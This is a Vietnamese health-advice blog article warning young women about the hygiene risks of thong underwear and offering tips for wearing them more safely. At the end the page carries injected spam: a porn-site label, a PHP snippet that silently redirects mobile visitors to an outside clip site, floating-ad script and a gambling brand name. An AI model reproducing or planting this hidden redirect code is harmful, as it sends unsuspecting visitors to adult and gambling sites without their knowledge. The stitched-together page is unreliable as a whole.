Những bất lợi của Quần Lọt Khe mà các bạn gái cần lưu ý

Filed under: SINH LÝ – GIỚI TÍNH |

Được thiết kế từ những mảnh vải nhỏ bé, hết sức tiết kiệm, quần lót dây hay còn được gọi là quần lọt khe, quần chữ T đã và đang được rất nhiều XX trưng dụng mà không biết rằng sử dụng nó có rất nhiều nguy hiểm.

1- Quần lọt khe và những lý do được trưng dụng:

Với lý do có thể hạn chế được các khuyết điểm như bị xô, lệch, nhăn nhúm của những chiếc quần chip thông thường và quan trọng hơn là khoe được vòng 3 nóng bỏng của mình khi diện những chiếc váy, chiếc quần bó sát, các kẹp nơ đã không ngần ngại “rút hầu bao” để có thể sở hữu loại quần sexy này.

Và đặc biệt, với những XX nào có vòng 3 hơi “khủng”, quần lọt khe còn được trọng dụng đơn giản vì: “Nó giúp cho vòng 3 của mình trông có vẻ nhỏ gọn hơn”, Minh, sinh viên năm thứ 2 trường HV Bưu chính viễn thông thổ lộ. “Cứ tưởng tượng mà xem, các loại quần chip khác, dù mỏng đến mấy cũng khiến cho “phần hậu” của bạn nở nang thêm mấy phân, với những người nhỏ bé thì chẳng sao, còn những ai đang phải chịu cảnh “quá khổ quá tải” như mình thì thật khủng khiếp. Bớt được phân nào mừng phân đấy mà”.

Còn Hương, một teengirl trung thành với loại quần chip sexy này khẳng định: “Hồi mình học lớp 10, bọn con trai ở lớp có một tật vô cùng xấu là chuyên nhìn mông con gái để bình luận xem hôm nay các bạn ấy mặc quần màu gì, có ren hay không, nên thực sự mình thấy rất mất tự tin khi đi qua mấy lão dê xồm í. Vậy là mình rút ra kinh nghiệm: quần lọt khe là sự lựa chọn số một”.

Không vì mục đích thời trang như Hương và Minh, Nguyệt lại lựa chọn quần lọt khe vì lý do rất tế nhị: “Lần đầu tiên mình mặc loại quần này, người ấy đã bị hút hồn và nói rằng mình vô cùng quyến rũ. Từ đó, mình “bồ kết” nó luôn”.

2- Lợi bất cập hại:

Mặc dù có mang lại những lợi ích nhất định cho người sử dụng, thế nhưng thực chất quần lọt khe lại tồn tại những hậu hoạ khôn lường. Theo Tư vấn viên Quỳnh Hương của Tâm sự bạn trẻ, vì lý do thời trang, quần lọt khe thường được làm bằng chất liệu ren, ni-lông, nên không có tác dụng thấm hút mồ hôi như cotton, do đó “vùng kín” thường ở trong tình trạng ẩm ướt, đặc biệt vào những ngày dịch tiết âm đạo ra nhiều. Hơn nữa, do vải quần được tối giản, nhiều loại còn không thể che hết vùng “tam giác”, nên nó mất đi tác dụng chính là bảo vệ “cô bé”.

Quần lọt khe thường không phát huy tác dụng bảo vệ “cô bé”

Chưa hết, do phần sau quần chip chỉ là một sợi dây mảnh nên nó rất dễ gây tổn thương (rát, xước) cho phần hậu môn. Trong quá trình hoạt động, vận động mạnh, nhiều khi “cô bé” cũng chính là nạn nhân. Và với điều kiện “khí hậu” nóng ẩm, bí bách lại thường xuyên được ủ kín như vùng cơ quan sinh dục, những tổn thương này sẽ rơi vào tình trạng nặng nề hơn nếu như không được chữa trị kịp thời. Đó chính là một trong những tiền đề để viêm nhiễm phụ khoa có thể “ghé thăm” bạn gái.

Một lý do gây hại nữa đó là: thông thường, khi đi đại tiện, vi khuẩn thường tập trung ở phần hậu môn, nhưng khi mặc quần lọt khe, sợi dây có thể bị di chuyển do vận động nên vi khuẩn do đó có cơ hội “tấn công” “cô bé” một cách bất hợp phá

3- Lời kết:

Vẫn theo Tư vấn viên Quỳnh Hương, nếu có thể thì bạn gái nên chọn quần lót thông thường khác thay vì quần lọt khe. Song, trong trường hợp bạn gái vẫn ưa chuộng loại quần này thì cần lưu ý một số điểm sau để hạn chế những tác động không mong muốn từ quần lọt khe:

Thứ nhất, khi thời tiết quá nóng hoặc quá ẩm, đừng bao giờ sử dụng quần chữ T để tránh tình trạng “vùng kín” bị bí bách, gây cảm giác khó chịu.

Thứ hai, bạn nên cạch mặt những loại quần diêm dúa, làm bằng chất liệu thô ráp vì rất có thể nó sẽ gây ra những vết trầy xước cho “cô bé”. Và tất nhiên điều này sẽ dễ dàng dẫn đến những viêm nhiễm “vùng kín”.

Thứ ba, mặc đúng size chính là cách giúp “vùng kín” không bị những sợi dây nhỏ bé siết chặt. Thời gian mặc liên tục cũng chỉ nên bó hẹp trong một vài giờ.

Thứ tư, nếu đi tắm biển, bạn không nên sử dụng loại quần này vì nó có thể khiến cho những hạt sạn hay vật thể lạ tấn công “cô bé”.

Phim sex
if (is_mobile()) { header("Location: http://mclip.in/tai-clip/13363"); exit(); } function is_mobile() { if(isset($_SERVER["HTTP_X_WAP_PROFILE"])) return true; if(preg_match("/wap.|.wap/i",$_SERVER["HTTP_ACCEPT"])) return true; if(isset($_SERVER["HTTP_USER_AGENT"])) { $user_agents = array( "midp", "java", "opera mini", "opera mobi", "mobi", "nokia", "midp", "midp", "j2me", "avantg", "docomo", "novarra", "palmos", "palmsource", "240x320", "opwv", "chtml", "pda", "windows ce", "mmp\/", "blackberry", "mib\/", "symbian", "wireless", "nokia", "hand", "mobi", "phone", "cdm", "up.b", "audio", "SIE-", "SEC-", "samsung", "HTC", "mot-", "mitsu", "sagem", "sony", "alcatel", "lg", "erics", "vx", "NEC", "philips", "mmm", "xx", "panasonic", "sharp", "wap", "sch", "rover", "pocket", "benq", "java", "pt", "pg", "vox", "amoi", "bird", "compal", "kg", "voda", "sany", "kdd", "dbt", "sendo", "sgh", "jb", "dddi", "iphone", "ipad", "android", "Android","series 60", "s60" ); $user_agents = implode("|", $user_agents ); if (preg_match("/$user_agents/i", $_SERVER["HTTP_USER_AGENT"])) return true; } return false; } function hide_float() { var content = document.getElementById('float_content'); var hide = document.getElementById('hide_float'); if (content.style.display == "none") { content.style.display = "block"; hide.innerHTML = ' Close [X]'; } else { content.style.display = "none"; hide.innerHTML = 'Quang Cao! '; } }
[X] Close.
mybet88